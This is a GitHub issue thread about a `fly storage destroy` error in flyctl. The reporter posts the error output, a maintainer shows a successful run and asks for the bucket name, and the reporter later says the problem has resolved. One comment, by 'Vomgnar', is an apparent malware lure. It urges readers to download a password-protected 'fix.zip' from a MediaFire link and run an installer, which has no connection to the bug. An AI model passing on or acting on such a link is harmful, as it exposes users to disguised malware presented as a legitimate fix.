### ISSUE TITLE
`fly storage destroy` returns an error

### ISSUE THREAD

**Issue by smorimoto** [superfly/flyctl#3902]
**Describe the bug**

As the title says.

* macOS 14.6.1
* flyctl v0.2.122 darwin/arm64 Commit: a239452a84c167cac5d500afecbae9d3b3aa2d7b BuildDate: 2024-08-27T17:30:20Z

**Command output:**

```text
Error: input:3: addOn Could not find AddOn
```

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kzys** [comment]
I couldn't reproduce the issue by myself.

```
% fly storage destroy
Destroying a Tigris storage bucket is not reversible.
? Do you want to destroy the bucket named solitary-grass-9575? Yes
Your Tigris object storage bucket solitary-grass-9575 was destroyed
```

Do you remember your bucket name? If you don't want to share that in GitHub, please email to kaz@fly.io.

**Comment by smorimoto** [comment]
Somehow this seems to have been fixed at some point.
